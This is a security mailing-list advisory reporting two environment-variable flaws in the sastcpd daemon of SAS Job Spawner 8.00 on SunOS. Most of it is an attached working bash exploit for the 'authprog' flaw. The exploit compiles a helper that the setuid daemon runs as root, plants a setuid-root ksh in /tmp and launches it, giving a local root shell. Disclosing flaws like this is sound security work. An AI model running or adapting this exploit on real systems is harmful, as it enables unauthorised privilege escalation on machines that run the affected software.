Hi, Several environment variable problems exist in the 'SAS Job Spawner for Open Systems version 8.00'. No other releases of the software were available to test. Sorry. authprog vulnerability ---------------------- The daemon passes a user-defined environment variable, 'authprog', to execve(). This obviously is a problem if sastcpd is setuid. A sample 'exploit' is attached. netencralg vulnerability ------------------------ I haven't poked at this long enough to determine whether or not it is exploitable. sastcpd segfaults if 'netencralg' is set to any value. All test were run on SunOS 5.8. Both vulnerabilities were discovered with Dave Aitel's/AtStake simple-yet-sexy sharefuzz 1.0. cheers, --rpc
#!/bin/bash
# sastcpd 8.0 'authprog' vulnerability.
# rpc <rpc@unholy.net> || <h@ckz.org>
# Thanks sharefuzz!
cat <<EOT >/tmp/hesh.c
int
main(void)
{
setuid(0);
setgid(0);
execl("/bin/ksh", "ksh", (char *)0);
}
EOT
cat <<EOT >/tmp/heh.c
int
main(void)
{
setuid(0);
setgid(0);
system("chown 0:0 /tmp/hesh");
system("chmod 4755 /tmp/hesh");
return 0;
}
EOT
gcc -o /tmp/heh /tmp/heh.c
gcc -o /tmp/hesh /tmp/hesh.c
export authprog=/tmp/heh
/path/to/sas/utilities/bin/sastcpd
sleep 1
rm /tmp/he*.c
rm /tmp/heh
/tmp/hesh
Attachment:
pgp00080.pgp
Description: PGP signature
